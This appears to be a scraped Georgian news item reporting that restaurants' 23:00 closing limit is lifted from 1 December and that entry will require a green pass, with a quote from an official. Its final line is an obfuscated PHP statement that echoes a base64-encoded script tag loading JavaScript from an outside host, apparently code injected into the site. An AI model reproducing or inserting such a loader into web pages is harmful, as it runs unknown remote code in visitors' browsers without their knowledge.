celsiusi
ავერსი საქკაბელი
საკოორდინაციო საბჭოს გადაწყვეტილებით, 1-ლი დეკემბრიდან რესტორნებისთვის საათობრივი შეზღუდვა იხსნება. აქამდე მათ მუშაობა 23:00 საათამდე შეეძლოთ.
 
"რესტორნებს, რომელთაც, როგორც მოგეხსენებათ, 1-ლი დეკემბრიდან სტუმრების მიღება შეუძლიათ მხოლოდ მწვანე სტატუსით, მუშაობაზე საათობრივი შეზღუდვა მოეხსნებათ, ანუ ისინი შეძლებენ თავისი გადაწყვეტილების შესაბამისად იმუშაონ იმდენი ხანი, რამდენსაც საჭიროდ ჩათვლიან", - თქვა უწყებათაშორის საკოორდინაციო საბჭოსთან არსებული ოპერაციული შტაბის უფროსმა გიორგი ღიბრაძემ.
 
მან აქვე განმარტა, რომ 1-ლი დეკემბრიდან რესტორნებში შესვლა მხოლოდ მწვანე პასპორტით იქნება შესაძლებელი.
1054
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");